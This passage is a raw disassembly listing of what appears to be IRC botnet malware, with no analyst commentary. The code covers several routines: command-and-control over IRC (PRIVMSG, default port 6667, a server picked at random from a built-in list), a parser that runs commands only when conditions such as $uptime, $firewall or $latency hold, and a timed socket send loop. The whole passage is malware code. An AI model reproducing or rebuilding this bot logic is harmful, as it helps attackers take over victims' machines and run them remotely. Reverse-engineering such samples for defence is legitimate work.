mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call dword_41720C ; send
push [ebp+var_63B8]
call dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DC34
push 3B6h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DE30
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DE30
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DE30
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DE30
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DE30
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DE30
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EEC8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F048
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B6h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B6h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, dword_41E9A4
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E898
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41E998
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41E998
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E718
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DE30
push offset byte_41E718
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA68[eax]
push offset dword_41E898
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA6C[eax]
push offset dword_41E998
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
